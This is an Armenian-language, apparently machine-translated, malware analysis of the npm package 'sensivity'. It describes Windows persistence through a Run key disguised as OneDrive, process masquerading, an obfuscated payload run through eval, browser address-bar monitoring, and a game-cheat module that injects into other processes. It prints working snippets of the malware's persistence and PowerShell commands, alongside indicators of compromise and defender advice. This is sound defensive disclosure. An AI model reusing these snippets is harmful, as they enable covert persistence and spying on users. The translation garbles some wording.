PairLoop: Թաքնված հեռակառավարման վահանակ npm փաթեթում

PairLoop: Մեկ npm փաթեթ, յոթանասուն տարբերակ և թաքնված Windows հեռակառավարման վահանակ

TL. DR

npm փաթեթը զգայունություն նկարագրվում է որպես «Զգայունության կառավարման վահանակ»։ Windows-ում այն ​​գործում է որպես հեռակառավարման և հսկողության գործիք։

Դրա մուտքի կետը, launcher.js, վերանվանում է իր սեփական պրոցեսը Runtime Broker, գրում է ավտոմատ մեկնարկի Run-key արժեք՝ անունով OneDriveUpdate որը վերագործարկում է փաթեթը թաքնված VBScript-ի միջոցով, ստեղծում է PowerShell-ը -ExecutionPolicy Bypass, և այնուհետև գնահատում է 171 ԿԲ խճճված սերվերի բեռը՝ 6.87 ՄԲ բնօրինակ մոդուլի հետ միասին, sens.node.

Այն ծառայում է որպես հեռախոսի զուգավորման կառավարման վահանակ TCP 3000 միացքի վրա և կարդում է ակտիվ դիտարկչի հասցեի տողի URL-ը Windows UIAutomation-ի միջոցով՝ փնտրելով մեկ կոշտ կոդավորված YouTube տեսանյութ։

Երկու մասերը, որոնք նախկինում կարդացվում էին որպես սև արկղեր, այժմ լուծված են։ Խցանված սերվերը, server.obf.js, օգտագործում է obfuscator.io RC4 string-array սխեման; դրա դեկոդերի վերաիրականացումը անցանց ռեժիմում (JavaScript չի գործարկվում) վերականգնում է մեկ արտաքին վերջնակետ — https://izopi.com/check.php — ներդրված RSA հանրային բանալու հետ միասին, որն օգտագործվում է ստորագրված լիցենզիայի պատասխանները ստուգելու համար։

Բնիկ մոդուլը, sens.node, փաթեթավորված չէ. դրա ներմուծման աղյուսակը և ներդրված տողերը այն նույնականացնում են որպես DirectX 11 / Dear ImGui խաղի մեջ ներառված ծածկույթ, որն ապահովում է aimbot, ESP (wall-hack) և triggerbot գործառույթներ, որոնք կառավարվում են հեռակառավարվող պրոցեսի ներարկման և հիշողության ընթերցման/գրառման միջոցով։

Դրա ներսում գտնվող տողերը հղում են կատարում տրանսպորտային միջոցների էթիկետներին և քարտեզի տեղադրություններին, որոնք համապատասխանում են GTA V / FiveM-ին: npm փաթեթը այդ բնօրինակ մոդուլի շուրջ առաքման և պահպանման փաթեթավորումն է:

Որոշիչ ազդանշանը գործառնական է, այլ ոչ թե տեխնիկական. մեկ անանուն հրատարակիչ թողարկել է մեկ փաթեթի մոտ յոթանասուն տարբերակ՝ 2.5.0- ից 2.5.69- ը — մի քանի օրվա ընթացքում, որոնցից յուրաքանչյուրը կրում էր նույն հրթիռային կայանքը։

Տեղադրումներ չկան hooksԲեռնվածքը գործարկվում է միայն փաթեթի մեկնարկից հետո։

Հարձակումը. Ինչպես է այն գործում

sensivity-ն ուղարկում է տասը ֆայլ: Package.json-ը նոսր է. չկա պահոցի դաշտ, չկա լիցենզիա, հիմնական և երկու bin կեղծանուններ (sensivity, sens), որոնք բոլորը մատնացույց են անում launcher.js-ին, և node launcher.js-ի մեկնարկային սկրիպտ: Հետինստալյացիա կամ նախնական տեղադրում չկա: npm տեղադրման ժամանակ ոչինչ չի ակտիվանում: Ստորև նկարագրված վարքագիծը կատարվում է, երբ օգտատերը մեկնարկում է փաթեթը՝ bin shim-ի, start սկրիպտի կամ require-ի միջոցով:

Tarball-ը պարունակում է գործարկիչը, խճճված սերվերը, բնօրինակ մոդուլը, Visual Basic սկրիպտը և կառավարման վահանակի public/web տեղեկատուն։ launcher.js-ը ընթեռնելի օրկեստրատորն է. գործարկման ժամանակ կարևոր տրամաբանությունը գտնվում է դրա բեռնվող երկու բլոկներում՝ խճճված սերվերում և կոմպիլացված բնօրինակ մոդուլում, որոնք երկուսն էլ լուծված են ստորև։

 Գործընթացների դիմակահանդես և կեղծ OneDrive թարմացուցիչ

Գործարկման սկզբում launcher.js-ը երկու անգամ սահմանում է իր սեփական պրոցեսի անունը՝

   javascript process.title = 'Runtime Broker'; 

Runtime Broker-ը օրինական Windows պրոցես է (RuntimeBroker.exe), որը միջնորդում է հավելվածների թույլտվությունները: Node պրոցեսի վերանվանումը դրան համապատասխանեցնելու համար նշանակում է, որ Task Manager-ին արագ հայացքը ոչ մի անսովոր բան չի ցույց տալիս:

Համառությունը գրվում է PowerShell-ի միջոցով, այլ ոչ թե ուղղակի գրանցամատյանի API-ի միջոցով։

javascript execSync(`powershell -NoProfile -Command "$k='HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run';$n='OneDriveUpdate';$v='wscript.exe \"${vbs}\"';Set-ItemProperty -Path $k -Name $n -Value $v -Force|Out-Null"`, { stdio: 'ignore', timeout: 5000 }); 

Ավտոմատ մեկնարկի արժեքը կոչվում է OneDriveUpdate, և այն ուղղակիորեն չի մատնանշում փաթեթին։ Այն մատնանշում է wscript.exe-ին, որը գործարկում է փաթեթում ներառված OneDrive.Standalone.Updater.vbs-ը։ Այդ սկրիպտը վերագործարկում է node launcher.js ֆայլը թաքնված պատուհանում։ Ե՛վ Run-key անունը, և՛ VBScript ֆայլի անունը փոխառում են Microsoft-ի ապրանքանիշը, ուստի ավտոմատ մեկնարկի գրառումը կարդացվում է որպես OneDrive-ի սովորական առաջադրանք։

PowerShell-ը՝ կատարման քաղաքականության շրջանցմամբ

Գործարկիչը բազմիցս վճարումներ է կատարում PowerShell-ին։ Սկաներները կարևոր նշում են որպես կարևորագույն, գեներացված .ps1 ֆայլի գործարկումը՝ անջատված կատարման քաղաքականությամբ։

javascript exec('start "Windows PowerShell" powershell -NoProfile -ExecutionPolicy Bypass -File "' + psFile + '"', { cwd: APP_DIR }); 

ExecutionPolicy Bypass-ը հեռացնում է այդ կանչի համար տեղական սկրիպտի ստորագրման ստուգումը: Ստեղծված սկրիպտները կատարում են հաջորդ բաժնում նկարագրված դիտարկիչի հսկողության և պատուհանների հայտնաբերման աշխատանքը:

Խճճված սերվերը և բնիկ մոդուլը

Տեղադրումից հետո launcher.js-ը բեռնում և կատարում է իր իրական օգտակար բեռը՝

const serverCode = fs.existsSync(path.join(APP_DIR, 'server.obf.js')) ? path.join(APP_DIR, 'server.obf.js') : path.join(APP_DIR, 'server.js'); eval(fs.readFileSync(serverCode, 'utf8'));

server.obf.js-ը 171 ԿԲ _0x-array obfuscation է՝ JavaScript-ի ձևանմուշ, որտեղ յուրաքանչյուր տող և նույնականացուցիչ փոխարինվում է խառնված զանգվածի ինդեքսով, այնուհետև կատարման ժամանակ ապահղվում է։ Սխեման obfuscator.io-ի կողմից ստեղծված RC4 տարբերակն է. մեկ դեկոդերային ֆունկցիա՝ base64-ը, վերծանում է զանգվածի գրառումը, ապա RC4-ը վերծանում է այն յուրաքանչյուր կանչի բանալիով։ Այդ դեկոդերի վերաիրականացումը առանձին սկրիպտում՝ միայն վերաիրականացումը գործարկելով արդյունահանված 821 գրառում ունեցող տողային զանգվածի վրա, երբեք փաթեթի սեփական JavaScript-ը, այն մաքուր կերպով վերակազմակերպում է։ Այն, ինչ մակերեսները համեստ են, բայց դեcisive՝ մեկ արտաքին URL՝ https://izopi.com/check.php`, որը կցված է LICENSE_URL հաստատունին, ներդրված RSA PUBLIC_KEY_PEM`; տեղային վահանակը ուղղորդում է /api/kill, /api/qr.png, /api/trigger, /api/url, /trigger/off և /trigger/status; և child_process, crypto և [Sensivity] sens.node բեռնված տողերը՝ վերջինը հենց այն գրանցամատյանի տողն է, որը գործարկիչը վերաշարադրում է բեռնված ծրագրային մոդուլի համար: Վերջնակետը լիցենզիայի ստուգումն է. հաճախորդը տեղադրում է նույնականացուցիչ (խճճված սերվերը ձևաչափում է Discord ID: %s տող), և RSA բանալին ստուգում է սերվերի ստորագրված պատասխանը:

sens.node-ը 6.87 ՄԲ կոմպիլացված բնիկ հավելում է, և այն փաթեթավորված չէ՝ բաժնի էնտրոպիան գտնվում է 5.6–6.6-ի վրա, իսկ PE ներմուծման և արտահանման աղյուսակները անփոփոխ են, ուստի դրա հնարավորությունները կարելի է անմիջապես կարդալ։ Այն արտահանում է napi_register_module_v1-ը, որը standard N-API հանգույցի մուտքի կետ, ուստի գնահատված սերվերը այն բեռնում է պարզ պահանջով: Դրա ներմուծման աղյուսակը tell-ն է: KERNEL32-ից այն քաշում է OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread, K32EnumProcessModules և Process32First/NextW՝ կանոնիկ հավաքածու՝ մեկ այլ պրոցես գտնելու, դրա ներսում հիշողություն հատկացնելու և այդ հիշողությունը կարդալու կամ գրելու համար: USER32-ից այն քաշում է GetAsyncKeyState, GetKeyState, mouse_event և SetCursorPos ֆայլերը. այն կապում է d3d11.dll, D3DCOMPILER_43 և dwmapi ֆայլերը՝ էկրանին վերադրման համար, և ամբողջական WINHTTP հավաքածուն՝ ցանցային զանգերի համար: Դրա ներկառուցված տողերը աներկբա անվանում են գործառույթների հավաքածուն՝ Enable Aimbot, Aimbot FOV, Box ESP, Skeleton ESP, Triggerbot, ESP Builder, Vehicle ESP, Electron Anticheat detected, և Dear ImGui banner Dear ImGui 1.91.3 WIP: Գտնվելու վայրի և էնթիթի տողերը, ինչպիսիք են Grapeseed Medical Clinic-ը և vehicle-ESP բառապաշարը, համապատասխանում են GTA V / FiveM-ին:

Բաժանումը, ըստ էության, միտումնավոր է. ընթեռնելի launcher.js ֆայլը պարունակում է միայն այն մասերը, որոնք սկաները հեշտությամբ կարդում է՝ համառություն, դիմակահանդես, գնահատման կանչի ինքնությունը, մինչդեռ խցանումը թաքցնում է մեկ արտաքին հոսթը՝ կատարողականի կոնտակտները, իսկ բինար ֆայլը պարունակում է խաղի ծածկույթի և գործընթացի ներարկման տրամաբանությունը: Գործարկիչը բարակ, լսելի թաղանթն է. խցանված սերվերը թաքցնում է ցանցի ինքնությունը. բնիկ մոդուլը օգտակար բեռ է: Մենք բինար ֆայլի ներմուծումները և տողերը նկարագրում ենք որպես կարդացված. մենք դրանցից չենք եզրակացնում օպերատորի նպատակը:

 Հեռախոսի զուգավորման կառավարման վահանակ 3000 միացքի վրա

Գործարկիչը կառավարում է TCP 3000 պորտի վրա գտնվող տեղական վեբ սերվերը և այն դիտարկում է որպես սինգլտոն։ Այն հարցում է կատարում առկա լսողի համար և մաքրում այն ​​կապվելուց առաջ։

 javascript execSync('powershell -NoProfile -Command "$c=Get-NetTCPConnection -LocalPort 3000 -State Listen -EA 0; if($c){$c | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force -EA 0 }}"', { stdio: 'ignore', timeout: 5000 }); 

Վահանակը հասանելի է http://localhost:3000 հասցեով՝ http://192.168.1.16:3000 կոշտ կոդավորված LAN պահեստային URL-ով: Public/ գրացուցակը և վահանակի վարքագիծը համապատասխանում են QR-զուգավորման հոսքին. հեռախոսը սկանավորում է կոդը և կապվում է հոսթին որպես հեռակառավարիչ: Գործարկիչում տեքստում արտաքին հրամանի և կառավարման տիրույթ չի երևում, բայց, ինչպես ցույց է տալիս վերևում նշված ապախաղացումը, մեկը առկա է խեղաթյուրված սերվերում՝ izopi.com լիցենզիայի վերջնակետը: Վահանակն ինքնին տեղական է և LAN-ի շրջանակով. միակ ելքային հոսթը այդ լիցենզիայի ստուգումն է:

Առանձնացված վերահսկիչի/աշխատողի մոդելը պահպանում է գործընթացը կենդանի։ Գործարկիչը վերագործարկվում է SENSIVITY_SUPERVISOR և SENSIVITY_WORKER միջավայրի դրոշներով, որոնցից յուրաքանչյուրը գործում է թաքնված, ուստի մեկ գործընթացի անջատման դեպքում մնում է վերահսկիչ, որը կարող է վերագործարկել այն։

Բրաուզերի հսկողություն և YouTube ազդանշան

Ամենատարբերակ վարքագիծը դիտարկիչի մոնիթորինգն է։ launcher.js-ը կառուցում է PowerShell, որը Windows UIAutomation-ին մղում է կարդալու աշխատող դիտարկիչի հասցեի տողը։

 javascript '$pattern = $edit.GetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern)', 

ValuePattern-ը վերադարձնում է UI տարրի տեքստային բովանդակությունը: Կիրառվելով զննարկչի հասցեի տողի խմբագրման կառավարման վրա, այն վերադարձնում է այն URL-ը, որը զոհը ներկայումս դիտում է՝ առանց զննարկչի ընդլայնման, առանց սկավառակի վրա պրոֆիլին դիպչելու և առանց API կեռիկի: Ստեղծված սկրիպտը իտերացնում է $browserNames ցուցակը և արդյունահանում է առաջին պլանում գտնվող զննարկչի URL-ը կամ պատուհանի վերնագիրը:

Այդ URL-ը ստուգվում է մեկ կոշտ կոդավորված թիրախի նկատմամբ՝

 javascript const TARGET_YOUTUBE_VIDEO_ID = 'wJWta2lO0Lw'; 

Գործարկիչը երեք վայրկյան տևողությամբ ցիկլով որոնում է YouTube-ը ցուցադրող դիտարկիչի պատուհանը, և ստեղծված PowerShell-ը պարունակում է Get-YouTubeBrowser / Test-TargetYouTubeUrl զույգ, որը համընկնում է այդ տեսանյութի ID-ի հետ: Դիտարկելի էֆեկտը կրկնակի է. ակտիվ դիտարկման URL-ը կարդացվում է զոհի էկրանից, և հայտնաբերվում է հոսթի փոխազդեցությունը մեկ կոնկրետ YouTube տեսանյութի հետ: Մենք նկարագրում ենք մեխանիզմը և թիրախը. մենք դրանցից դրդապատճառ չենք եզրակացնում:

Հասցեի տողում կարդացվող տվյալները սկաների կողմից պիտակավորվում են որպես sensitive_data_enumeration՝ Process::env և UIAutomation աղբյուր, որը սնուցում է ցանցային աշխատանքային միջավայրը։ Այն առանձին-առանձին անվնաս տեսք ունի և վերահսկողության է ենթարկվում միայն այն դեպքում, երբ տվյալների կյանքի ցիկլը հետագծվում է UIAutomation աղբյուրից մինչև խճճված սերվեր։

Ժամանակացույց և տարբերակի զարգացում

Զգայունությունը միանվագ վերբեռնում չէ: Հրատարակչի հաշվին այս մեկ փաթեթի մոտ յոթանասուն հրատարակված տարբերակ կա, և նորերը շարունակում էին հայտնվել վերանայման ժամանակահատվածում: Գործարկիչը ընդլայնվում է 2.5.x տողում գործառույթ առ գործառույթ, մինչդեռ դրա կայունությունը և բեռնման արագությունը մնում են անփոփոխ:

Ամսաթիվ (UTC)Դիտարկված տարբերակներԳործարկիչի վիճակը
2026-06-02 2.5.8 - 2.5.46 (25) Հիմնական QR-պանելի գործարկիչ; Գործարկման բանալու պահպանում; խճճված սերվերի գնահատում:
2026-06-03 2.5.53 - 2.5.61 (6) Նույն մատնահետքը; վահանակային հետքի ճնշումը։
2026-06-04 2.5.67, 2.5.68 (2) Ավելացվում է YouTube-ում ամրացված ներգրավվածության թիրախ wJWta2lO0Lw.
2026-06-05 2.5.0 - 2.5.69 (24) Բացթողումները լրացնելով ամբողջ տիրույթում. վերահսկիչ/աշխատող-հսկիչ։

Ներբեռնված ներկայացուցիչների՝ 2.5.0, 2.5.36 և 2.5.69 տարբերակների միջև գործարկիչի ընթերցումը ցույց է տալիս չորս մակարդակ։ Ամենավաղ կառուցվածքները կրում են QR-զույգի հիմնական գործարկիչը։ 2.5.33-ից հայտնվում է UIAutomation հասցեների տողի հավաքիչը։ 2.5.58-ից ավելացվում է վերահսկիչի կառավարման շերտ։ 2.5.64-ից հավաքածուն լրացնում է առանձին վերահսկիչի/աշխատողի հսկիչը։ Ամբողջ ընթացքում չորս բան անփոփոխ են մնում՝ OneDriveUpdate Run ստեղնը, OneDrive.Standalone.Updater.vbs dropper-ը, գնահատված server.obf.js-ը և sens.node բնիկ մոդուլը։

2026-06-05 ալիքը նշանակալի է, քանի որ այն վերահրատարակել է ցածր տարբերակների համարները՝ 2.5.0-ից մինչև 2.5.15, որոնք գտնվում են օրեր առաջ հաստատված տարբերակներից ցածր։ Արդյունքում գրանցամատյանում հայտնվում է անընդհատ 2.5.x տող, որտեղ յուրաքանչյուր տարբերակ ունի նույն գործարկիչը։

Փոխզիջման ցուցիչներ

Ստորև նշված բոլոր ցուցիչները կարդացվել են անմիջապես փաթեթի tarball-ից: Ընթերցելի գործարկիչը պարունակում է միայն loopback և մեկ մասնավոր LAN հասցե. միակ արտաքին հոսթի անունը՝ izopi.com, վերականգնվել է server.obf.js ֆայլը offline ռեժիմից ապաօբֆուսքացիայի միջոցով:

ՏիպՑուցիչՆշումներ
Փաթեթnpm:sensivity (≈70 տարբերակ, 2.5.0-2.5.69)Միակ փաթեթի հրատարակիչ; առանց պահոց; առանց լիցենզիայի։
Ֆայլlauncher.jsԸնթերցելի նվագախմբիչ; գլխավոր և bin թիրախ։
Ֆայլserver.obf.js (≈171 ԿԲ)obfuscator.io RC4 string-array օգտակար բեռ, բեռնված միջոցով eval(fs.readFileSync(...)).
Ֆայլsens.node (≈6.87 ՄԲ)PE32+ x86-64 հանգույցի N-API հավելում; SHA-256 66b674884042fca2f056d06854325ea0e8bc902d4e3cdaeafd5fe08c7d0aab40.
ՖայլOneDrive.Standalone.Updater.vbsԹաքնված վերագործարկիչ (node launcher.js).
Ցանցhttps://izopi.com/check.phpԼիցենզիան/հավաստագրման վերջնակետը վերականգնվել է խճճված սերվերից։ Ներկառուցված RSA հանրային բանալին ստուգում է պատասխանները։
ԸնդունակությունOpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThreadՀեռակա պրոցեսների ներարկում և հիշողության մեջ ընթերցման/գրելու հնարավորություն։
ԸնդունակությունEnable Aimbot, Box ESP, Triggerbot, Vehicle ESP, Dear ImGui 1.91.3 WIPDirectX 11 / ImGui խաղի ծածկույթ, որն իրականացնում է aimbot, ESP և triggerbot գործառույթները։
ՌեեստրըHKCU\Software\Microsoft\Windows\CurrentVersion\Run → OneDriveUpdateԱվտոմատ մեկնարկի արժեքը ցույց է տալիս wscript.exe և VBScript գործարկիչը։
Գործընթացըprocess.title = 'Runtime Broker'Ներկայանում է որպես օրինական Windows Runtime Broker գործընթաց։
Վախեցնողpowershell -NoProfile -ExecutionPolicy Bypass -File <generated>.ps1Կատարման քաղաքականության շրջանցում, որն օգտագործվում է ստեղծված PowerShell սկրիպտների համար։
ՎախեցնողUIAutomation ValuePattern կարդալ զննարկչի հասցեի տողըԿարդում է առաջին պլանում գտնվող դիտարկիչի պատուհանի URL-ը։
ՎախեցնողՆպատակային տեսանյութի ID wJWta2lO0Lw; 3 վայրկյան տևողությամբ YouTube հարցումԿապակցված ներգրավվածության մոնիթորինգի ազդանշան։
Ցանցhttp://localhost:3000, պահեստային http://192.168.1.16:3000QR-զուգավորման կառավարման վահանակը բաց է ինչպես տեղական, այնպես էլ տեղական ցանցում։
միջավայրSENSIVITY_SUPERVISOR, SENSIVITY_WORKERԱռանձնացված վերահսկիչ գործընթացի համակարգման դրոշներ։

Վերագրում, ազդեցություն և պաշտպաններ

Փաթեթը հրապարակվում է մեկ npm հաշվի կողմից, որի նշված էլ. փոստը չհաստատված Gmail հասցե է: Հաշիվը կրում է խիստ բացասական գրանցամատյանի հեղինակության գնահատական, պահպանում և հրապարակում է միայն այս մեկ փաթեթը և չունի կապված աղբյուրի պահոց: Մենք չենք հաստատել էլ. փոստի սեփականությունը և արշավը վերագրում ենք հրատարակչի հաշվին, այլ ոչ թե որևէ անվանական անձի: Գործարկիչը չունի մաքուր տեքստային ենթակառուցվածք, բայց միակ արտաքին հոսթն այժմ հայտնի է. խճճված սերվերը կապվում է izopi.com-ի հետ լիցենզիայի ստուգման համար, իսկ բնիկ մոդուլը՝ կարդացվում է իր ներմուծման աղյուսակից և տողերից, այլ ոչ թե հակադարձ հրահանգ-հրահանգ՝ խաղի ծածկույթ է, որը ներարկում է և կարդում է մեկ այլ գործընթացի հիշողությունը:

Նկատելի ազդեցությունը ընկնում է Windows օգտատերերի վրա, ովքեր տեղադրում և գործարկում են զգայունությունը՝ սպասելով կառավարման վահանակի օգտակար ծրագրի: Այդ հոսթերի վրա փաթեթը սահմանում է ավտոմատ մեկնարկի կայունություն, որը քողարկվում է որպես OneDrive առաջադրանք, վերանվանվում է՝ ընդօրինակելով համակարգային գործընթացը, կարդում է օգտատիրոջ կողմից դիտվող ցանկացած ֆայլի URL-ը և ստեղծում է զուգավորման վահանակ, որը կապում է մեքենան հեռակառավարիչի հետ տեղական ցանցի միջոցով: Վերահսկիչի/աշխատողի հսկողությունը նշանակում է, որ մեկ գործընթացի ավարտը չի հեռացնում այն. Run-key գրառումը գոյատևում է վերագործարկումներից հետո: macOS-ը և Linux-ը չեն թիրախավորվում գործարկիչի կողմից. կայունությունը, PowerShell-ը և UIAutomation ուղիները միայն Windows-ի համար են:

Յոթանասուն տարբերակի փոփոխությունը միտում է, որը արժե նշել: Մեկ փաթեթը մի քանի օրվա ընթացքում տասնյակ անգամ վերահրատարակելը, այդ թվում՝ արդեն հեռացված տարբերակների համարներից ցածր տարբերակների համարները լրացնելը, պահպանում է ակտիվ պատճենը գրանցամատյանում հեռացումների միջև ընկած ժամանակահատվածում և խափանում է տարբերակի վրա ամրացված արգելափակված ցուցակները: sensivity@2.5.61-ի արգելափակված ցուցակի գրառումը ոչինչ չի անում sensivity@2.5.3-ի հաջորդ օրը վերահրատարակման դեմ:

Պաշտպանները կարող են գործել հետևյալի հիման վրա.

  • Անմիջապես արգելափակեք փաթեթի անվան զգայունությունը registry-proxy-ում և CI թույլատրելի ցուցակներում: Առանձին տարբերակների ամրացումը վնասում է վերահրապարակման ռիթմին. անունը կայունության ցուցանիշն է:
  • Գտեք OneDriveUpdate անունով Run արժեքը, որի տվյալները կանչում են wscript.exe-ը .vbs-ի դեմ՝ յուրաքանչյուր օգտատիրոջ ուղու վրա: OneDrive-ի իրական թարմացնողը այս կերպ չի գրանցվում:
  • Զգուշացում Node.js պրոցեսի վերաբերյալ, որի process.title-ը Runtime Broker է: Իրական բրոքերը RuntimeBroker.exe-ն է, այլ ոչ թե Node runtime-ը:
  • Նշել npm տեղադրման ժամանակի բեռնումները այն փաթեթների համար, որոնք ուղարկում են կոմպիլացված .node հավելում և քույր .obf.js ֆայլի eval(fs.readFileSync(…)): Այդ զույգը՝ անթափանցիկ բնիկ երկուական ֆայլը, որը բեռնվում է մշուշոտ տեքստային բեռի կողքին, այստեղ կառուցվածքային ազդանշանն է՝ անկախ որևէ տողային IOC-ից:
  • Կառավարվող Windows վերջնակետերում կասկածելի համարեք ցանկացած տեղական կապված լսող, որը գտնվում է 3000 պորտի վրա և առաջանում է անսպասելի Node պրոցեսի կողմից։
  • Արգելափակել կամ զգուշացնել izopi.com-ին մշակողի կամ վերջնական օգտատիրոջ հոսթերից ուղարկվող արտագնա հարցումների վերաբերյալ։ Սա փաթեթի միակ արտաքին վերջնակետն է, որին հասնում են /check.php-ով՝ խցանված սերվերից։
  • Ցանկացած փաթեթավորված .node հավելման դեպքում, նախքան դրան վստահելը, ստուգեք դրա ներմուծման աղյուսակը: OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread համադրությունը հեռակա պրոցեսի ներարկում է անկախ նրանից, թե ինչ է պնդում փաթեթը. այստեղ այն գտնվում է Direct3D ծածկույթի և aimbot/ESP/triggerbot տողերի կողքին:

Ստատիկ վերլուծության համար pipelines, համոզմունքի ձևը կայուն է տարբերակների փոփոխության ողջ ընթացքում՝ ոչ ցանցային տեղադրման պրոֆիլ, գործընթացի վերնագրի նշանակում հայտնի համակարգային գործընթացի անվանը, PowerShell-ի միջոցով Run-key գրառում և սկավառակից կարդացված ֆայլի գնահատում: Դրանցից ոչ մեկը կախված չէ դոմեյնից, IP հասցեից կամ տարբերակի համարից, որը հաջորդ վերահրապարակումը կարող է շրջանցել:

 Սայլակ

[npm: զգայունություն] – այստեղ քննարկվող փաթեթի տարբերակի տողի գրանցամատյանի էջը. կարող է հեռացվել։

sca-tools-software-composition-analysis-tools
Առաջնահերթություն տվեք, շտկեք և պաշտպանեք ձեր ծրագրային ռիսկերը
Ստացեք ձեր անվճար հաշիվը։
Ոչ մի վարկային քարտ չի պահանջվում:

Ապահովեք ձեր ծրագրային ապահովման մշակումը և մատակարարումը

Xygeni Product Suite-ի հետ